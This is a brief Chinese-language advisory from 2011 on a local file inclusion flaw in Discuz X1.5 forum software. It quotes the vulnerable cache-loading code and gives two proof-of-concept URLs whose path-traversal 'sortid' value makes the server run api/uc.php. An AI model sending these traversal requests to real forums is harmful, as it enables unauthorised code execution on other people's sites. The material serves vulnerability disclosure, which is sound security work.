DISCUZ X1.5 本地文件包含漏洞

发布日期：2011-02.28
发布作者：Jannock

影响版本：DISCUZ X1.5
官方网站：http://www.discuz.net/

漏洞类型：文件包含
漏洞描述：DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。

config_global.php  $_config['cache']['type'] = ‘file’;   function cachedata($cachenames) {  ……  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;  ……  if($isfilecache) {  $lostcaches = array();  foreach($cachenames as $cachename) {  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {  $lostcaches[] = $cachename;  }  }   ……  }  

地址：
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

 

标签分类： 文件包含